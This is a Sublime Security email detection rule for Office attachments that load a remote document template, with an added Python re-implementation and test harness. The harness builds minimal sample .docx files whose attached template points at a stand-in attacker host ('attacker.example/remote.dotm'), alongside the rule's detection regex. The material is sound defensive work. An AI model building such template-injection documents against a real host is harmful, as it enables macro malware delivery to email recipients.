Attachment: Office document loads remote document template

Recursively scans archives and Office documents to detect remote document template injection.

Sublime rule

name: "Attachment: Office document loads remote document template"
description: |
    Recursively scans archives and Office documents to detect remote document template injection.
references:
  - "https://delivr.to/payloads?id=c7a7195e-0de3-428d-a32c-5fd59a3012da"
type: "rule"
severity: "medium"
source: |
  type.inbound
  and any(attachments,
          (
            (
              // macro-capable office files, common archives, or extensionless binary blobs
              .file_extension in~ $file_extensions_macros
              or .file_extension in~ $file_extensions_common_archives
              or (
                .file_extension is null
                and .file_type == "unknown"
                and .content_type == "application/octet-stream"
                and .size < 100000000
              )
            )
            and any(file.explode(.),
                    .flavors.mime == "text/xml"
                    and any(.scan.strings.strings, regex.icontains(., "Target.{0,20}http.{0,200}dotm"))
            )
          )
  )
tags:
  - "Attack surface reduction"
attack_types:
  - "Malware/Ransomware"
detection_methods:
  - "Archive analysis"
  - "File analysis"
  - "URL analysis"
id: "d9601104-c330-5995-9fae-4d30b969c081"
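The detection logic of the rule above, re-implemented as an added Python example (this is not code from the Sublime rule or its repository). It explodes a ZIP-based attachment, recurses into nested ZIPs the way file.explode does for archives, and runs the rule's regex Target.{0,20}http.{0,200}dotm over every XML part. Beside the regex it adds a stricter structural check that parses the .rels parts and flags any attachedTemplate relationship whose TargetMode is External or whose Target is an http(s) URL; this catches a remote template served from a URL that does not contain "dotm", which the regex alone misses. The sample documents produced by build_docx and wrap_in_zip are constructed in memory with only the parts relevant to the check and are not real Word files; the example also skips the rule's file-extension gate and treats every ZIP container as a candidate, which is a simplification.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# The rule's pattern, applied case-insensitively as regex.icontains does.
REMOTE_TEMPLATE_RE = re.compile(r"Target.{0,20}http.{0,200}dotm", re.IGNORECASE)

# Relationship type Word uses for an attached template (local or remote).
ATTACHED_TEMPLATE_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def explode(data, depth=0, max_depth=5):
    """Yield (path, bytes) for every file in a ZIP, recursing into nested ZIPs
    (an Office document inside an archive, an archive inside an archive)."""
    if depth > max_depth or not zipfile.is_zipfile(io.BytesIO(data)):
        return
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            member = zf.read(info)
            yield info.filename, member
            for inner_path, inner in explode(member, depth + 1, max_depth):
                yield f"{info.filename}/{inner_path}", inner


def find_remote_templates(data):
    """The rule's check: return [(path, matched_text)] for XML parts matching the regex."""
    hits = []
    for path, member in explode(data):
        # Stand-in for the rule's .flavors.mime == "text/xml" filter; .rels parts are XML too.
        if not path.lower().endswith((".xml", ".rels")):
            continue
        m = REMOTE_TEMPLATE_RE.search(member.decode("utf-8", errors="replace"))
        if m:
            hits.append((path, m.group(0)))
    return hits


def find_external_attached_templates(data):
    """Stricter structural check: return [(path, target)] for every attachedTemplate
    relationship that is external or points at an http(s) URL, whatever the extension."""
    found = []
    for path, member in explode(data):
        if not path.lower().endswith(".rels"):
            continue
        try:
            root = ET.fromstring(member)
        except ET.ParseError:
            continue
        for rel in root.iter(f"{RELS_NS}Relationship"):
            if rel.get("Type") != ATTACHED_TEMPLATE_TYPE:
                continue
            target = rel.get("Target", "")
            if rel.get("TargetMode") == "External" or target.lower().startswith(("http://", "https://")):
                found.append((path, target))
    return found


def build_docx(target, external=True):
    """Constructed sample: a minimal .docx-shaped ZIP with only the parts that matter
    here (not a real Word file). `target` is the attached-template reference."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        f'<Relationships xmlns="{RELS_NS[1:-1]}">\n'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE_TYPE}" Target="{target}"{mode}/>\n'
        "</Relationships>"
    )
    settings = (
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:attachedTemplate r:id="rId1"/></w:settings>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def wrap_in_zip(members):
    """Constructed sample: an archive attachment containing the given {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    remote = "http://attacker.example/remote.dotm"  # constructed, non-routable sample URL
    samples = {
        "remote .dotm": build_docx(remote),
        "remote, no dotm in URL": build_docx("https://attacker.example/tpl"),
        "local Normal.dotm": build_docx("Normal.dotm", external=False),
        "remote .dotm inside .zip": wrap_in_zip({"inner.docx": build_docx(remote)}),
    }
    for label, blob in samples.items():
        print(f"{label}: regex={find_remote_templates(blob)} structural={find_external_attached_templates(blob)}")
```

Running the module prints both checks for the four constructed samples: the regex and the structural check agree on the plain remote .dotm, the nested one, and the benign local template, while only the structural check flags the remote template whose URL lacks "dotm".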
